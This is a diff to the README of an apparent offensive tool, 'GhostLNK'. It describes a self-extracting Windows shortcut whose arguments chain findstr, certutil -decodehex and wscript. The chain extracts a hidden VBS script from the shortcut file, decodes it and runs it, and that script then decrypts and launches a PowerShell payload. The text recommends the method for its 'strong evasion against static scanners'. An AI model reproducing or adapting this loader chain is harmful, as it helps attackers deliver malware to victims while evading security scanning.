Excalibra/GhostLNK/README.md

 These approaches are not silver bullets but are designed to raise the bar for detection.

-### Self‑Extracting LNK (cmd + findstr + wscript)
+### Self‑Extracting LNK (Hex) — The Recommended Method
 ```
 Target:   C:\Windows\System32\cmd.exe
-Arguments: /c findstr /v "^-----" "%~f0" > "%TEMP%\e.vbs" & wscript //B "%TEMP%\e.vbs"
+Arguments: /c "findstr /b "GHOSTLNK_HEX:" "%~f0" > "%TEMP%\e.hex" & certutil -decodehex "%TEMP%\e.hex" "%TEMP%\e.vbs" & wscript //B "%TEMP%\e.vbs""
 ```
-The LNK file contains a VBS script wrapped between `-----BEGIN VBS-----` and `-----END VBS-----` markers, followed by the encrypted payload. `findstr` extracts the script, `wscript` executes it, and the VBS decrypts and runs the PowerShell payload.
-This method avoids placing PowerShell directly in the LNK arguments.
+The LNK file contains a hex‑encoded VBS script after the `GHOSTLNK_HEX:` marker. `findstr` extracts the hex data, `certutil` decodes it to a VBS file, and `wscript` executes it.
+The VBS then decrypts and runs the PowerShell payload.
+No Base64 patterns and no PowerShell in the arguments—this method has demonstrated strong evasion against static scanners.

 ---